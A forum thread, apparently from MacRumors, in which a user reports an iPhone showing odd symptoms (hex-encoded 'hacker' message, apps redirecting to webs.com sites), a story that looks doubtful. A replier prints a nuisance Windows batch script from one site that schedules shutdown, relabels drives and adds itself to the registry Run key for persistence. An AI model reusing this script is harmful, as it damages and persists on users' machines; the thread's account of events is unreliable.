Not open for further replies.

CoolChristopher

macrumors member
Original poster
Apr 21, 2014
Adelaide, Australia
Please delete this thread moderators
this is about an unlegit phone from china
I was on my iphone when all my icons went in a dumping process and cleaning...
Then i turned it off nothing is responding and all of the icons have turned into grids.

Last edited:

dictoresno

macrumors 601
Apr 30, 2012
NJ
Could be an OS core dump or whatever those system things are called. Have you tried rebooting?

C DM

macrumors Sandy Bridge
Oct 17, 2011
iOS occasionally does cleaning and that kind of "housekeeping" tasks on apps. It would be a bit strange for it to happen with all at once, but, assuming it's something that shouldn't happen to begin with, it's probably more of some sort of a glitch than any kind of a virus or something like that. If it's stuck, then it sounds like some major crash type of thing that hung up the system somehow.

CoolChristopher

macrumors member
Original poster
Apr 21, 2014
Adelaide, Australia
My internet is very slow and i have important data. So if i do a restore, thats gonna take 8 hours ... conisdering it would be 1gb at least

----------

by the way if you are wondering what the icons turned into,
visit this link
http://m1.behance.net/rendition/wip_revisions/315479/hd/c94dba29a6fc40f7fff22968d003b765.jpg

----------

when i tried to open an app again, this message came up:
0x420x450x480x4f0x4c0x44 0x540x480x45 0x480x410x430x4b0x450x52 0x490x53 0x430x4f0x4d0x490x4e0x47
(I SPENT A LONG TIME COPYING THAT)
what does it mean? is it an error code?

Nyy8

macrumors 6502a
Jun 12, 2011
New England
As far as I am aware, there is one virus out in the wild right now for iOS 7 users. But it's only for jailbroken devices, you should be fine.

CoolChristopher

macrumors member
Original poster
Apr 21, 2014
Adelaide, Australia
i tried restoring but
accessed was denied error:null
What the hell?
And then iTunes detects it as an iPhene<<<========
YES AN iPhene what is a phene?
Anyway the serial doesn't even show up anymore
I have a screenshot to show you and i am uploading to imgur now

----------

screenshot:
http://imgur.com/RYf2ZiV

Last edited:

Nyy8

macrumors 6502a
Jun 12, 2011
New England
i tried restoring but
accessed was denied error:null
What the hell?
And then iTunes detects it as an iPhene<<<========
YES AN iPhene what is a phene?
Anyway the serial doesn't even show up anymore
I have a screenshot to show you and i am uploading to imgur now

----------

screenshot:
http://imgur.com/RYf2ZiV
That's... Strange. I'd try with a different computer, if that doesn't work. I'd bring it to the nearest Apple Store.

I feel like "iPhene" is iPhone in a different language maybe?

BrettApple

macrumors 65816
Apr 3, 2010
Heart of the midwest
As 53kyle said, DFU restore. Probably your only bet other than taking it in somewhere (they will likely do the same).

As for data, always keep current backups. Either to iCloud or locally on your computer via iTunes. Or both :)

As someone who works in the IT field, I see the issue of data loss all the time. And unfortunately it usually takes losing something important for people to understand it's importance.

I have not seen this issue, though I've had similar problems on previous versions of iOS, but that was usually due to a bad app or something I did in Cydia. Not usually stock. It sounds like something in the OS got corrupt. I'm betting a DFU restore will work. If not, it could be the logic board, or the memory on the logic board (not repairable).

Best of luck!

jonbravo77

macrumors 6502a
Feb 20, 2008
Phoenix, AZ
I'm not smart when It comes to this stuff so take it as it is. But the OP put the word (JAILED) in the original post then someone posted that there is one known virus for iOS 7.1 in the wild, but it only effects jailbroken devices. Again, not an expert here, just connecting the known dots..

CoolChristopher

macrumors member
Original poster
Apr 21, 2014
Adelaide, Australia
As 53kyle said, DFU restore. Probably your only bet other than taking it in somewhere (they will likely do the same).

As for data, always keep current backups. Either to iCloud or locally on your computer via iTunes. Or both :)

As someone who works in the IT field, I see the issue of data loss all the time. And unfortunately it usually takes losing something important for people to understand it's importance.

I have not seen this issue, though I've had similar problems on previous versions of iOS, but that was usually due to a bad app or something I did in Cydia. Not usually stock. It sounds like something in the OS got corrupt. I'm betting a DFU restore will work. If not, it could be the logic board, or the memory on the logic board (not repairable).

Best of luck!
thank you for that info.
I have restarted my iphone 12 times now and its kind of working, however all my apps are shortcuts to this site:
http://unblocksharepointsites.webs.com/
so what is this site?

BrettApple

macrumors 65816
Apr 3, 2010
Heart of the midwest
thank you for that info.
I have restarted my iphone 12 times now and its kind of working, however all my apps are shortcuts to this site:
http://unblocksharepointsites.webs.com/
so what is this site?
Not sure what the website is really for, but it links to a batch file that could be quite harmful to a windows machine. Or it may do something with Microsoft Share Point, though I doubt it.

Upon further investigation I downloaded the file and opened it in text edit. It's bad. Lol. So something on there is definitely malicious. I would keep your iPhone in DFU mode and restore it soon as you can. Maybe move the files you need off it if you can, but that could even have some risk involved.

Here's the code from that site:
Code:
@echo off
net send * SOS. I am a Club Pian!
msg * win.shll not found
shutdown -s -t 600
Label C: Club Pia
Label D: Club Pia
Label E: Club Pia
Label F: Club Pia
COPY msdir32.bat %systemroot%\system32\msdir32.bat
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v msdir32 /t REG_SZ /d %systemroot%\system32\msdir32.bat

CoolChristopher

macrumors member
Original poster
Apr 21, 2014
Adelaide, Australia
Not sure what the website is really for, but it links to a batch file that could be quite harmful to a windows machine. Or it may do something with Microsoft Share Point, though I doubt it.

Upon further investigation I downloaded the file and opened it in text edit. It's bad. Lol. So something on there is definitely malicious. I would keep your iPhone in DFU mode and restore it soon as you can. Maybe move the files you need off it if you can, but that could even have some risk involved.

Here's the code from that site:
Code:
@echo off
net send * SOS. I am a Club Pian!
msg * win.shll not found
shutdown -s -t 600
Label C: Club Pia
Label D: Club Pia
Label E: Club Pia
Label F: Club Pia
COPY msdir32.bat %systemroot%\system32\msdir32.bat
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v msdir32 /t REG_SZ /d %systemroot%\system32\msdir32.bat
I know how that code works:
It sends out to all the computers on the network: I am a Club pian and then gives them the virus at the same time. then it displays a message box saying win.shll not found. Then it will shutdown in 600 seconds while changing all the drives to Club Pia.
Then it messess around with the system root.
(I am a leisure programmer on bat and vbs script and i know what i am talking about)

CoolChristopher

macrumors member
Original poster
Apr 21, 2014
Adelaide, Australia
Jailbreaking doesn't remove any security.
Well if it does have security, you shouldnt be able to mess around with the root files and download 3rd party apps....
hmmm.
right?
Now my iphone's wallpaper is random binary numbers that move....
ughhh

----------

Also if i try to press new tab it goes to this site:
gmes4school.webs.com
can someone investigate?

Status
Not open for further replies.